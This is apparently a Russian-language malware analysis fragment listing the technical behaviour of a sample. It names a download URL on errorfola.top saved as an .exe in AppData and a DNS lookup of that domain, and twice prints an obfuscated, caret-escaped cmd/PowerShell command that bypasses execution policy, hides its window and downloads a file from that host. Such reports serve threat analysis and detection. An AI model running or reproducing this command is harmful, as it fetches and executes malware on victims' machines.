Техническая информация
- http://errorfola.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWERshel^l.exe ^-^execUtI^ON^PoliC^y^ bYp^as^s ^-N^o^p^Rofi^l^e^ -wI^NDoW^s^TyLe H^idde^n^ (n^Ew-^OB^j^eCt ^S^YSTem^.^neT.w^eB^cl^I^ent)^.D^o^w^N^Load^fIl^e('http://errorfol...
- DNS ASK er###fola.top
- '<SYSTEM32>\cmd.exe' /C "P^OWERshel^l.exe ^-^execUtI^ON^PoliC^y^ bYp^as^s ^-N^o^p^Rofi^l^e^ -wI^NDoW^s^TyLe H^idde^n^ (n^Ew-^OB^j^eCt ^S^YSTem^.^neT.w^eB^cl^I^ent)^.D^o^w^N^Load^fIl^e('http://errorfol...' (со скрытым окном)